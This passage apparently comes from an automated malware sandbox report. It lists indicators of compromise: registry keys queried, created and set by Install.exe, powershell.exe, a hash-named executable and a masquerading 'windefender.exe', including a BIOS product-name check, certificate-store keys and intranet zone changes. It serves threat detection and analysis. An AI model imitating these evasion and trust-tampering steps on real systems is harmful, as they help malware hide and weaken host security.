description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2452 = "Saint Pierre Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1662 = "Bahia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" windefender.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 99e14e26ff06da01 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ecaebe2bff06da01 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\MrtCache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d149192cff06da01 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0ec76d26ff06da01 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8f141032ff06da01 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = adfe2f41ff06da01 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
